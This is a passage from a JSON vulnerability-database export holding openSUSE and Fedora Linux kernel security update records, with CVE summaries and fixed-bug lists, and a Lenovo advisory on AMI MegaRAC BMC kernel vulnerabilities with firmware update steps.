drivers/usb/serial/whiteheat.c in the Whiteheat USB Serial\n Driver in the Linux kernel allowed physically proximate attackers to\n execute arbitrary code or cause a denial of service (memory corruption and\n system crash) via a crafted device that provides a large amount of (1)\n EHCI or (2) XHCI data associated with a bulk 
response.\n\n CVE-2014-3184: The report_fixup functions in the HID subsystem in the\n Linux kernel might have allowed physically proximate attackers to cause a\n denial of service (out-of-bounds write) via a crafted device that provides\n a small report descriptor, related to (1) drivers/hid/hid-cherry.c, (2)\n drivers/hid/hid-kye.c, (3) drivers/hid/hid-lg.c, (4)\n drivers/hid/hid-monterey.c, (5) drivers/hid/hid-petalynx.c, and (6)\n drivers/hid/hid-sunplus.c.\n\n CVE-2014-3182: Array index error in the logi_dj_raw_event function in\n drivers/hid/hid-logitech-dj.c in the Linux kernel allowed physically\n proximate attackers to execute arbitrary code or cause a denial of service\n (invalid kfree) via a crafted device that provides a malformed\n REPORT_TYPE_NOTIF_DEVICE_UNPAIRED value.\n\n CVE-2014-3181: Multiple stack-based buffer overflows in the\n magicmouse_raw_event function in drivers/hid/hid-magicmouse.c in the Magic\n Mouse HID driver in the Linux kernel allowed physically proximate\n attackers to cause a denial of service (system crash) or possibly execute\n arbitrary code via a crafted device that provides a large amount of (1)\n EHCI or (2) XHCI data associated with an event.\n\n CVE-2014-7826: kernel/trace/trace_syscalls.c in the Linux kernel did not\n properly handle private syscall numbers during use of the ftrace\n subsystem, which allowed local users to gain privileges or cause a denial\n of service (invalid pointer dereference) via a crafted application.\n\n CVE-2013-7263: The Linux kernel updated certain length values before\n ensuring that associated data structures have been initialized, which\n allowed local users to obtain sensitive information from kernel stack\n memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call,\n related to net/ipv4/ping.c, net/ipv4/raw.c, net/ipv4/udp.c,\n net/ipv6/raw.c, and net/ipv6/udp.c. This update fixes the leak of the port\n number when using ipv6 sockets. 
(bsc#853040).\n\n CVE-2013-2898: Fixed potential kernel caller confusion via\n past-end-of-heap-allocation read in sensor-hub HID driver.\n\n CVE-2013-2891: Fixed 16 byte past-end-of-heap-alloc zeroing in steelseries\n HID driver.\n\n CVE-2014-6410: The __udf_read_inode function in fs/udf/inode.c in the Linux\n kernel did not restrict the amount of ICB indirection, which allowed\n physically proximate attackers to cause a denial of service (infinite loop\n or stack consumption) via a UDF filesystem with a crafted inode.\n\n CVE-2014-5471: Stack consumption vulnerability in the\n parse_rock_ridge_inode_internal function in fs/isofs/rock.c in the Linux\n kernel allowed local users to cause a denial of service (uncontrolled\n recursion, and system crash or reboot) via a crafted iso9660 image with a\n CL entry referring to a directory entry that has a CL entry.\n\n CVE-2014-5472: The parse_rock_ridge_inode_internal function in\n fs/isofs/rock.c in the Linux kernel allowed local users to cause a denial\n of service (unkillable mount process) via a crafted iso9660 image with a\n self-referential CL entry.\n\n CVE-2014-0206: Array index error in the aio_read_events_ring function in\n fs/aio.c in the Linux kernel allowed local users to obtain sensitive\n information from kernel memory via a large head value.\n\n CVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on 32-bit\n x86 platforms, when syscall auditing is enabled and the sep CPU feature\n flag is set, allowed local users to cause a denial of service (OOPS and\n system crash) via an invalid syscall number, as demonstrated by number\n 1000.\n\n CVE-2014-5206: The do_remount function in fs/namespace.c in the Linux\n kernel did not maintain the MNT_LOCK_READONLY bit across a remount of a\n bind mount, which allowed local users to bypass an intended read-only\n restriction and defeat certain sandbox protection mechanisms via a "mount\n -o remount" command within a user namespace.\n\n CVE-2014-5207: 
fs/namespace.c in the Linux kernel did not properly\n restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing\n MNT_ATIME_MASK during a remount of a bind mount, which allowed local users\n to gain privileges, interfere with backups and auditing on systems that\n had atime enabled, or cause a denial of service (excessive filesystem\n updating) on systems that had atime disabled via a "mount -o remount"\n command within a user namespace.\n\n CVE-2014-1739: The media_device_enum_entities function in\n drivers/media/media-device.c in the Linux kernel did not initialize a\n certain data structure, which allowed local users to obtain sensitive\n information from kernel memory by leveraging /dev/media0 read access for a\n MEDIA_IOC_ENUM_ENTITIES ioctl call.\n\n CVE-2014-4943: The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux\n kernel allowed local users to gain privileges by leveraging data-structure\n differences between an l2tp socket and an inet socket.\n\n CVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on 32-bit\n x86 platforms, when syscall auditing is enabled and the sep CPU feature\n flag is set, allowed local users to cause a denial of service (OOPS and\n system crash) via an invalid syscall number, as demonstrated by number\n 1000.\n\n CVE-2014-5077: The sctp_assoc_update function in net/sctp/associola.c in\n the Linux kernel, when SCTP authentication is enabled, allowed remote\n attackers to cause a denial of service (NULL pointer dereference and OOPS)\n by starting to establish an association between two endpoints immediately\n after an exchange of INIT and INIT ACK chunks to establish an earlier\n association between these endpoints in the opposite direction.\n\n CVE-2014-4171: mm/shmem.c in the Linux kernel did not properly implement\n the interaction between range notification and hole punching, which\n allowed local users to cause a denial of service (i_mutex hold) by using\n the mmap system call to access a hole, as 
demonstrated by interfering with\n intended shmem activity by blocking completion of (1) an MADV_REMOVE\n madvise call or (2) an FALLOC_FL_PUNCH_HOLE fallocate call.\n\n Also the following bugs were fixed:\n - KEYS: Fix stale key registration at error path (bnc#908163).\n\n - parport: parport_pc, do not remove parent devices early (bnc#856659).\n\n - xfs: fix directory hash ordering bug.\n - xfs: mark all internal workqueues as freezable (bnc#899785).\n\n - [media] uvc: Fix destruction order in uvc_delete() (bnc#897736).\n\n - cfq-iosched: Fix wrong children_weight calculation (bnc#893429).\n\n - target/rd: Refactor rd_build_device_space + rd_release_device_space\n (bnc#882639).\n\n - Btrfs: Fix memory corruption by ulist_add_merge() on 32bit arch\n (bnc#887046).\n\n - usb: pci-quirks: Prevent Sony VAIO t-series from switching usb ports\n (bnc#864375).\n - xhci: Switch only Intel Lynx Point-LP ports to EHCI on shutdown\n (bnc#864375).\n - xhci: Switch Intel Lynx Point ports to EHCI on shutdown (bnc#864375).\n\n - ALSA: hda - Fix broken PM due to incomplete i915 initialization\n (bnc#890114).\n\n - netbk: Don't destroy the netdev until the vif is shut down (bnc#881008).\n - swiotlb: don't assume PA 0 is invalid (bnc#865882).\n\n - PM / sleep: Fix request_firmware() error at resume (bnc#873790).\n\n - usbcore: don't log on consecutive debounce failures of the same port\n (bnc#818966).\n\n", "edition": 1, "modified": "2014-12-21T13:04:41", "published": "2014-12-21T13:04:41", "id": "OPENSUSE-SU-2014:1677-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-12/msg00021.html", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4579", "CVE-2013-4587", "CVE-2013-6367", "CVE-2013-6368", "CVE-2013-6376", "CVE-2014-0049", "CVE-2014-0055", 
"CVE-2014-0069", "CVE-2014-0077", "CVE-2014-0100", "CVE-2014-0101", "CVE-2014-0102", "CVE-2014-0131", "CVE-2014-0155", "CVE-2014-0181", "CVE-2014-0196", "CVE-2014-0206", "CVE-2014-1438", "CVE-2014-1446", "CVE-2014-1737", "CVE-2014-1738", "CVE-2014-1874", "CVE-2014-2039", "CVE-2014-2309", "CVE-2014-2523", "CVE-2014-2568", "CVE-2014-2580", "CVE-2014-2678", "CVE-2014-2851", "CVE-2014-3122", "CVE-2014-3144", "CVE-2014-3145", "CVE-2014-3153", "CVE-2014-3534", "CVE-2014-3917", "CVE-2014-3940", "CVE-2014-4014", "CVE-2014-4171", "CVE-2014-4508", "CVE-2014-4699", "CVE-2014-4715", "CVE-2014-4943", "CVE-2014-5045", "CVE-2014-5077", "CVE-2014-5206", "CVE-2014-5207"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2014-08-16T22:30:46", "published": "2014-08-16T22:30:46", "id": "FEDORA:1835E22100", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: kernel-3.15.10-200.fc20", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0343", "CVE-2013-1059", "CVE-2013-2232", "CVE-2013-2234", "CVE-2013-2888", "CVE-2013-2889", "CVE-2013-2891", "CVE-2013-2892", "CVE-2013-2893", "CVE-2013-2894", "CVE-2013-2895", "CVE-2013-2896", "CVE-2013-2897", "CVE-2013-2899", "CVE-2013-4125", "CVE-2013-4254", "CVE-2013-4343", "CVE-2013-4345", "CVE-2013-4348", "CVE-2013-4350", "CVE-2013-4387", "CVE-2013-4470", "CVE-2013-4563", "CVE-2013-4579", "CVE-2013-4587", "CVE-2013-6367", "CVE-2013-6368", "CVE-2013-6376", "CVE-2013-6378", "CVE-2013-6380", "CVE-2013-6382", "CVE-2013-6405", "CVE-2014-0049", "CVE-2014-0055", "CVE-2014-0069", "CVE-2014-0077", "CVE-2014-0100", "CVE-2014-0101", "CVE-2014-0102", "CVE-2014-0131", "CVE-2014-0155", "CVE-2014-0206", "CVE-2014-1438", "CVE-2014-1446", 
"CVE-2014-1737", "CVE-2014-1738", "CVE-2014-1874", "CVE-2014-2039", "CVE-2014-2309", "CVE-2014-2523", "CVE-2014-2568", "CVE-2014-2580", "CVE-2014-2678", "CVE-2014-2851", "CVE-2014-3122", "CVE-2014-3144", "CVE-2014-3145", "CVE-2014-3153", "CVE-2014-3534", "CVE-2014-3917", "CVE-2014-3940", "CVE-2014-4014", "CVE-2014-4171", "CVE-2014-4508", "CVE-2014-4699", "CVE-2014-4715", "CVE-2014-4943", "CVE-2014-5045", "CVE-2014-5077", "CVE-2014-5206", "CVE-2014-5207"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2014-08-19T07:09:03", "published": "2014-08-19T07:09:03", "id": "FEDORA:2BA602158D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: kernel-3.14.17-100.fc19", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "lenovo": [{"lastseen": "2020-12-13T07:21:46", "bulletinFamily": "info", "cvelist": ["CVE-2018-10882", "CVE-2016-10208", "CVE-2018-10877", "CVE-2016-7097", "CVE-2016-9191", "CVE-2018-13053", "CVE-2016-7910", "CVE-2017-17558", "CVE-2017-15299", "CVE-2018-10880", "CVE-2015-2925", "CVE-2014-9529", "CVE-2018-9568", "CVE-2014-7822", "CVE-2016-6213", "CVE-2015-8215", "CVE-2015-3288", "CVE-2016-3070", "CVE-2014-9420", "CVE-2019-10639", "CVE-2018-1066", "CVE-2019-11478", "CVE-2015-8964", "CVE-2017-7618", "CVE-2016-7916", "CVE-2014-8160", "CVE-2017-9242", "CVE-2015-3339", "CVE-2016-2847", "CVE-2018-10881", "CVE-2019-12819", "CVE-2017-16535", "CVE-2017-5551", "CVE-2015-5706", "CVE-2016-5696", "CVE-2018-5344", "CVE-2017-2671", "CVE-2016-0723", "CVE-2014-9728", "CVE-2014-8989", "CVE-2017-14106", "CVE-2014-9730", "CVE-2019-11190", "CVE-2018-6927", "CVE-2019-13272", "CVE-2018-5995", "CVE-2014-7975", "CVE-2014-5206", "CVE-2016-3156", "CVE-2018-5953", "CVE-2016-0758", "CVE-2014-8559", "CVE-2015-7613", "CVE-2017-7495", 
"CVE-2017-13305", "CVE-2017-1000253", "CVE-2016-6828", "CVE-2016-0728", "CVE-2017-1000364", "CVE-2019-11833", "CVE-2015-1350", "CVE-2019-11599", "CVE-2019-11477", "CVE-2018-18281", "CVE-2017-18270", "CVE-2014-3631", "CVE-2016-4482", "CVE-2018-1093", "CVE-2017-17449", "CVE-2014-9729", "CVE-2015-3636", "CVE-2018-16884", "CVE-2019-10638", "CVE-2017-5669", "CVE-2018-10883", "CVE-2019-3901", "CVE-2018-17972", "CVE-2016-8405", "CVE-2017-2647", "CVE-2013-4312", "CVE-2015-1333", "CVE-2018-18344", "CVE-2017-16531", "CVE-2018-9422", "CVE-2019-9213", "CVE-2014-5207", "CVE-2015-8816", "CVE-2013-7446", "CVE-2015-4167", "CVE-2018-10087", "CVE-2014-6410", "CVE-2017-7542", "CVE-2014-7145", "CVE-2018-20169", "CVE-2018-10124", "CVE-2016-0823", "CVE-2019-5489", "CVE-2016-7914", "CVE-2018-1092", "CVE-2018-10876", "CVE-2018-1000026", "CVE-2016-8645", "CVE-2019-11479", "CVE-2017-5897", "CVE-2017-8064", "CVE-2018-12896", "CVE-2014-7970", "CVE-2017-17806", "CVE-2015-1805"], "description": "**Lenovo Security Advisory:** LEN-29592\n\n**Potential Impact**: Denial of service, privilege escalation, information disclosure\n\n**Severity:** High\n\n**Scope of Impact:** Industry-wide\n\n**CVE Identifier:** CVE-2013-4312, CVE-2013-7446, CVE-2014-3631, CVE-2014-5206, CVE-2014-5207, CVE-2014-6410, CVE-2014-7145, CVE-2014-7822, CVE-2014-7970, CVE-2014-7975, CVE-2014-8160, CVE-2014-8559, CVE-2014-8989, CVE-2014-9420, CVE-2014-9529, CVE-2014-9728, CVE-2014-9729, CVE-2014-9730, CVE-2015-1333, CVE-2015-1350, CVE-2015-1805, CVE-2015-2925, CVE-2015-3288, CVE-2015-3339, CVE-2015-3636, CVE-2015-4167, CVE-2015-5706, CVE-2015-7613, CVE-2015-8215, CVE-2015-8816, CVE-2015-8964, CVE-2016-0723, CVE-2016-0728, CVE-2016-0758, CVE-2016-0823, CVE-2016-10208, CVE-2016-2847, CVE-2016-3070, CVE-2016-3156, CVE-2016-4482, CVE-2016-5696, CVE-2016-6213, CVE-2016-6828, CVE-2016-7097, CVE-2016-7910, CVE-2016-7914, CVE-2016-7916, CVE-2016-8405, CVE-2016-8645, CVE-2016-9191, CVE-2017-1000253, CVE-2017-1000364, CVE-2017-13305, 
CVE-2017-14106, CVE-2017-15299, CVE-2017-16531, CVE-2017-16535, CVE-2017-17449, CVE-2017-17558, CVE-2017-17806, CVE-2017-18270, CVE-2017-2647, CVE-2017-2671, CVE-2017-5551, CVE-2017-5669, CVE-2017-5897, CVE-2017-7495, CVE-2017-7542, CVE-2017-7618, CVE-2017-8064, CVE-2017-9242, CVE-2018-1000026, CVE-2018-10087, CVE-2018-10124, CVE-2018-1066, CVE-2018-10876, CVE-2018-10877, CVE-2018-10880, CVE-2018-10881, CVE-2018-10882, CVE-2018-10883, CVE-2018-1092, CVE-2018-1093, CVE-2018-12896, CVE-2018-13053, CVE-2018-16884, CVE-2018-17972, CVE-2018-18281, CVE-2018-18344, CVE-2018-20169, CVE-2018-5344, CVE-2018-5953, CVE-2018-5995, CVE-2018-6927, CVE-2018-9422, CVE-2018-9568, CVE-2019-10638, CVE-2019-10639, CVE-2019-11190, CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-11599, CVE-2019-11833, CVE-2019-12819, CVE-2019-13272, CVE-2019-3901, CVE-2019-5489, CVE-2019-9213\n\n**Summary Description: **\n\nAMI has released AMI MegaRAC SP-X Baseboard Management Controller (BMC) security enhancements to address Linux kernel vulnerabilities.\n\n**Mitigation Strategy for Customers (what you should do to protect yourself): **\n\nUpgrade to the BMC firmware version (or newer) indicated for your model in the Product Impact section below.\n\n****\n\n****\n\n**Product Impact:**\n\nTo download the version specified for your product below, follow these steps:\n\n 1. Navigate to your product's Drivers & Software page by going to [https://support.lenovo.com/](<https://pcsupport.lenovo.com/us/en/>). PRC users should go to <https://newsupport.lenovo.com.cn/>\n 2. Search for your product by name or machine type.\n 3. Click Drivers & Software on the left menu panel.\n 4. Click on Manual Update to browse by Component type.\n 5. 
Compare the minimum fix version for your product from the applicable product table below with the latest version posted on the support site.\n\nAlternatively and if applicable for your product, you may use Lenovo Vantage or Windows Update to update to the latest available version. To confirm you are using the minimum fix version (or higher), go to Add/Remove Programs and check the version listed there.\n", "edition": 11, "modified": "2020-09-17T13:59:41", "published": "2020-04-13T19:22:04", "id": "LENOVO:PS500321-AMI-MEGARAC-SP-X-BMC-VULNERABILITIES-NOSID", "href": "https://support.lenovo.com/us/en/product_security/ps500321-ami-megarac-sp-x-bmc-vulnerabilities", "title": "AMI MegaRAC SP-X BMC Vulnerabilities - Lenovo Support US", "type": "lenovo", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T01:02:01", "bulletinFamily": "info", "cvelist": ["CVE-2018-10882", "CVE-2016-10208", "CVE-2018-10877", "CVE-2016-7097", "CVE-2016-9191", "CVE-2018-13053", "CVE-2016-7910", "CVE-2017-17558", "CVE-2017-15299", "CVE-2018-10880", "CVE-2015-2925", "CVE-2014-9529", "CVE-2018-9568", "CVE-2014-7822", "CVE-2016-6213", "CVE-2015-8215", "CVE-2015-3288", "CVE-2016-3070", "CVE-2014-9420", "CVE-2019-10639", "CVE-2018-1066", "CVE-2019-11478", "CVE-2015-8964", "CVE-2017-7618", "CVE-2016-7916", "CVE-2014-8160", "CVE-2017-9242", "CVE-2015-3339", "CVE-2016-2847", "CVE-2018-10881", "CVE-2019-12819", "CVE-2017-16535", "CVE-2017-5551", "CVE-2015-5706", "CVE-2016-5696", "CVE-2018-5344", "CVE-2017-2671", "CVE-2016-0723", "CVE-2014-9728", "CVE-2014-8989", "CVE-2017-14106", "CVE-2014-9730", "CVE-2019-11190", "CVE-2018-6927", "CVE-2019-13272", "CVE-2018-5995", "CVE-2014-7975", "CVE-2014-5206", "CVE-2016-3156", "CVE-2018-5953", "CVE-2016-0758", "CVE-2014-8559", "CVE-2015-7613", "CVE-2017-7495", "CVE-2017-13305", "CVE-2017-1000253", "CVE-2016-6828", "CVE-2016-0728", "CVE-2017-1000364", "CVE-2019-11833", "CVE-2015-1350", "CVE-2019-11599", "CVE-2019-11477", 
"CVE-2018-18281", "CVE-2017-18270", "CVE-2014-3631", "CVE-2016-4482", "CVE-2018-1093", "CVE-2017-17449", "CVE-2014-9729", "CVE-2015-3636", "CVE-2018-16884", "CVE-2019-10638", "CVE-2017-5669", "CVE-2018-10883", "CVE-2019-3901", "CVE-2018-17972", "CVE-2016-8405", "CVE-2017-2647", "CVE-2013-4312", "CVE-2015-1333", "CVE-2018-18344", "CVE-2017-16531", "CVE-2018-9422", "CVE-2019-9213", "CVE-2014-5207", "CVE-2015-8816", "CVE-2013-7446", "CVE-2015-4167", "CVE-2018-10087", "CVE-2014-6410", "CVE-2017-7542", "CVE-2014-7145", "CVE-2018-20169", "CVE-2018-10124", "CVE-2016-0823", "CVE-2019-5489", "CVE-2016-7914", "CVE-2018-1092", "CVE-2018-10876", "CVE-2018-1000026", "CVE-2016-8645", "CVE-2019-11479", "CVE-2017-5897", "CVE-2017-8064", "CVE-2018-12896", "CVE-2014-7970", "CVE-2017-17806", "CVE-2015-1805"], "description": "**Lenovo Security Advisory:** LEN-29592\n\n**Potential Impact**: Denial of service, privilege escalation, information disclosure\n\n**Severity:** High\n\n**Scope of Impact:** Industry-wide\n\n**CVE Identifier:** CVE-2013-4312, CVE-2013-7446, CVE-2014-3631, CVE-2014-5206, CVE-2014-5207, CVE-2014-6410, CVE-2014-7145, CVE-2014-7822, CVE-2014-7970, CVE-2014-7975, CVE-2014-8160, CVE-2014-8559, CVE-2014-8989, CVE-2014-9420, CVE-2014-9529, CVE-2014-9728, CVE-2014-9729, CVE-2014-9730, CVE-2015-1333, CVE-2015-1350, CVE-2015-1805, CVE-2015-2925, CVE-2015-3288, CVE-2015-3339, CVE-2015-3636, CVE-2015-4167, CVE-2015-5706, CVE-2015-7613, CVE-2015-8215, CVE-2015-8816, CVE-2015-8964, CVE-2016-0723, CVE-2016-0728, CVE-2016-0758, CVE-2016-0823, CVE-2016-10208, CVE-2016-2847, CVE-2016-3070, CVE-2016-3156, CVE-2016-4482, CVE-2016-5696, CVE-2016-6213, CVE-2016-6828, CVE-2016-7097, CVE-2016-7910, CVE-2016-7914, CVE-2016-7916, CVE-2016-8405, CVE-2016-8645, CVE-2016-9191, CVE-2017-1000253, CVE-2017-1000364, CVE-2017-13305, CVE-2017-14106, CVE-2017-15299, CVE-2017-16531, CVE-2017-16535, CVE-2017-17449, CVE-2017-17558, CVE-2017-17806, CVE-2017-18270, CVE-2017-2647, CVE-2017-2671, 
CVE-2017-5551, CVE-2017-5669, CVE-2017-5897, CVE-2017-7495, CVE-2017-7542, CVE-2017-7618, CVE-2017-8064, CVE-2017-9242, CVE-2018-1000026, CVE-2018-10087, CVE-2018-10124, CVE-2018-1066, CVE-2018-10876, CVE-2018-10877, CVE-2018-10880, CVE-2018-10881, CVE-2018-10882, CVE-2018-10883, CVE-2018-1092, CVE-2018-1093, CVE-2018-12896, CVE-2018-13053, CVE-2018-16884, CVE-2018-17972, CVE-2018-18281, CVE-2018-18344, CVE-2018-20169, CVE-2018-5344, CVE-2018-5953, CVE-2018-5995, CVE-2018-6927, CVE-2018-9422, CVE-2018-9568, CVE-2019-10638, CVE-2019-10639, CVE-2019-11190, CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-11599, CVE-2019-11833, CVE-2019-12819, CVE-2019-13272, CVE-2019-3901, CVE-2019-5489, CVE-2019-9213\n\n**Summary Description: **\n\nAMI has released AMI MegaRAC SP-X Baseboard Management Controller (BMC) security enhancements to address Linux kernel vulnerabilities.\n\n**Mitigation Strategy for Customers (what you should do to protect yourself): **\n\nUpgrade to the BMC firmware version (or newer) indicated for your model in the Product Impact section below.\n\n****\n\n****\n\n**Product Impact:**\n\nTo download the version specified for your product below, follow these steps:\n\n 1. Navigate to your product's Drivers & Software page by going to [https://support.lenovo.com/](<https://pcsupport.lenovo.com/us/en/>). PRC users should go to <https://newsupport.lenovo.com.cn/>\n 2. Search for your product by name or machine type.\n 3. Click Drivers & Software on the left menu panel.\n 4. Click on Manual Update to browse by Component type.\n 5. Compare the minimum fix version for your product from the applicable product table below with the latest version posted on the support site.\n\nAlternatively and if applicable for your product, you may use Lenovo Vantage or Windows Update to update to the latest available version. 
To confirm you are using the minimum fix version (or higher), go to Add/Remove Programs and check the version listed there.\n", "edition": 43, "modified": "2020-09-17T13:59:41", "published": "2020-04-13T19:22:04", "id": "LENOVO:PS500321-NOSID", "href": "https://support.lenovo.com/us/en/product_security/ps500321", "title": "AMI MegaRAC SP-X BMC Vulnerabilities - Lenovo Support US", "type": "lenovo", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}